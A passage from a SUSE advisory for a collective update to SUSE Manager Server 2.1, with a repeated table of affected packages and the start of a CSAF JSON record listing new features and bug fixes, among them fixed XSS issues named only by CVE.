Affected products
Recommended
89 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
89 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x | — |
Vendor Fix
|
Threats
Impact
moderate
References
168 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Recommended update for SUSE Manager Server 2.1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis collective update for SUSE Manager Server 2.1 provides the following \nnew features:\n\n * Connect SUSE Manager to the SUSE Customer Center.\n * Manage SLE12 systems.\n * ISS: export/import information about cloned channels to support\n Service Pack migration on ISS slaves. (FATE#317789)\n * New API calls: system.scheduleSPMigration(),\n system.scheduleDistUpgrade(). (FATE#314785, FATE#314340)\n\nAdditionally, several issues have been fixed:\n\nauditlog-keeper:\n\n * Fix value too long for type character varying(2048). (bnc#872351)\n * Fix init.d script restart. (bsc#872029)\n\ncobbler:\n\n * Require syslinux-x86_64 on s390x. (bsc#884051)\n * Fix fetching of profiles for auto-installation. (bsc#880936)\n * Fix port guessing in koan. (bsc#855389)\n * Add \u0027copy-default\u0027 option to grubby-compat. (bsc#855389)\n * Handle elilo in SUSE. (bsc#855389)\n * Fix wrong option \u0027text\u0027 in SUSE environment. (bsc#901058)\n * Fix re-installation on SLE with static network configuration.\n (bsc#883487)\n * Add RHEL 7 as a valid operating system version.\n\noracle-config:\n\n * No need to pre-require Apache as its user and group are available in\n the base system.\n\nosad:\n\n * Enable and install osad during first installation. (bsc#901958)\n\npxe-default-image:\n\n * Add bind-utils (dig) to packagelist. (bsc#889739)\n * Wait for gateway to become available before register. (bsc#895001)\n\nrhnlib:\n\n * Ensure bytes strings are sent to pyOpenSSL. (bnc#880388)\n\nrhnpush:\n\n * Add default path structure to proxy lookaside that avoids collisions.\n\nsm-ncc-sync-data:\n\n * Add SUSE Cloud 4 channels. (bnc#883057)\n * Add channels for SUSE Manager Server 2.1 s390x.\n * Fix parent label of the LTSS channel for SLMS.\n * Add ATI and nVidia channels for SLED11-SP3. (bsc#901108)\n * Add support for RES7 in SUSE Manager. (bsc#897723, bsc#893608)\n\nsmdba:\n\n * Fix \u0027system check breaks backup and other configuration\u0027.\n * Implement rotating PostgreSQL backup. (bsc#896244)\n * Space reclamation caused ORA-00942: table or view does not exist.\n (bsc#906850)\n * Archival of PosgreSQL transaction log does not recover in case of no\n space left on device. (bsc#915140)\n\nspacecmd:\n\n * Fix listupgrades. (bsc#892707)\n * Make print_result a static method of SpacewalkShell. (bsc#889605)\n * Call listAutoinstallableChannels() for listing distributions.\n (bsc#887879)\n * Fix spacecmd schedule listing. (bsc#902494)\n * Fix call of setCustomOptions() during kickstart_importjson.\n (bsc#879904)\n * Fix configchannel export: do not create \u0027contents\u0027 key for\n directories. (bsc#908849)\n\nspacewalk-backend:\n\n * Insert update tag at the correct place for SLE12. (bsc#907677)\n * Trigger generation of metadata if the repo contains no packages.\n (bsc#870159)\n * Convert mtime to localtime to prevent invalid times because of DST.\n (bsc#914437)\n * Do not exit with error if a vendor channel has no URL associated.\n (bsc#914260)\n * Convert empty string to null for DMI values. (bsc#911272)\n\nspacewalk-branding:\n\n * CVE patches adapted for colour blind users. (bnc#872298)\n * Underline in icons is removed. (bnc#880001)\n * Fix link to macro documentation. (bsc#895961)\n * Fix branding in error message. (bsc#902503)\n\nspacewalk-certs-tools:\n\n * Fix removal of existing host key entries. (bsc#886391)\n * Remove duplicates from authorized_keys2 as well. (bsc#885889)\n * Do not allow registering a SUSE Manager server against itself.\n (bsc#841731)\n\nspacewalk-client-tools:\n\n * Allow unicode characters in proxy username and password.\n * Send correct hostname. (bsc#887538)\n\nspacewalk-config:\n\n * Add recommended Apache settings from the Security Team.\n\nspacewalk-java:\n\n * Fix human dates now() staying unmodified. (bnc#880081)\n * Allow for null evr and archs on event history detail. (bnc#880327)\n * Disable form autocompletion in some places. (bnc#879998)\n * Fix datepicker time at xx:xx PM pre-filled with xx:xx AM.\n (bnc#881522)\n * Fixed package upgrade via SSM when using the Oracle DB as backend.\n (bnc#889721)\n * This update fixes various cross-site scripting (XSS) issues in\n spacewalk-java. (CVE-2014-3654, bnc#902182)\n * Sync correct repositories. (bnc#904959)\n * Fix pxt page link to point to the ported version of that page.\n (bsc#903720)\n * Correctly apply patches to multiple systems in SSM. (bsc#898242)\n * Fix CVE audit when some packages of a patch are already installed.\n (bsc#899266)\n * Download CSV button does not export all columns (\u0027Base Channel\u0027\n missing). (bsc#896238)\n * Read and display only a limited number of logfile lines. (bsc#883009)\n * Fix package upgrade via SSM. (bsc#889721)\n * Fix logrotate for /var/log/rhn/rhn_web_api.log. (bsc#884081)\n * Throw channel name exception if name is already used. (bnc#901675)\n * Don\u0027t commit when XMLRPCExceptions are thrown. (bsc#908320)\n * Remove \u0027Select All\u0027 button from system currency report. (bsc#653265)\n * Fix documentation search. (bsc#875452)\n * Add API listAutoinstallableChannels(). (bsc#887879)\n * Avoid ArrayIndexOutOfBoundsException with invalid URLs. (bsc#892711)\n * Avoid NumberFormatException in case of invalid URL. (bsc#892711)\n * Lookup kickstart tree only when org is found. (bsc#892711)\n * Fix NPE on GET /rhn/common/DownloadFile.do. (bsc#892711)\n * Port of the advanced provisioning option page to bootstrap.\n (bnc#862408)\n * mgr-sync refresh sets wrong permissions on JSON files. (bnc#907337)\n * Fix link to macro documentation. (bsc#895961)\n * Forward to \u0027raw mode\u0027 page in case this is an uploaded profile.\n (bsc#904841)\n * Enlarge big text area to use more available screen space.\n (bnc#867836)\n * Fix links to monitoring documentation. (bsc#906887)\n * Fix install type detection. (bsc#875231)\n * Point \u0027Register Clients\u0027 link to \u0027Client Configuration Guide\u0027.\n (bsc#880026)\n * Change order of installer type: prefer SUSE Linux. (bsc#860299)\n * Fix ISE when clicking system currency. (bnc#905530)\n * Set cobbler hostname variable when calling system.createSystemRecord.\n (bnc#904699)\n * Fix wrong install=http://nullnull line when calling\n system.createSystemRecord. (bnc#904699)\n * Explain snapshot/rollback behavior better. (bsc#808947)\n * Fix patch syncing: prevent hibernate.NonUniqueObjectException\n androllback. (bsc#903880)\n * Remove \u0027Add Selected to SSM\u0027 from system overview page. (bsc#901776)\n * Fix CVE audit in case of multi-version package installed and patch in\n multi channels. (bsc#903723)\n * Update channel family membership when channel is updated.\n (bsc#901193)\n * Add log warning if uploaded file size \u003e 1MB. (bnc#901927)\n * Fix channel package compare. (bsc#904690)\n * Fix automatic configuration file deployment via snippet. (bsc#898426)\n * Add client hostname or IP to log messages. (bsc#904732)\n * Fixed copying text from kickstart snippets. (bsc#880087)\n * Fix auditlog config yaml syntax. (bsc#913221)\n * Show Proxy tab if system is a proxy even when assigned to 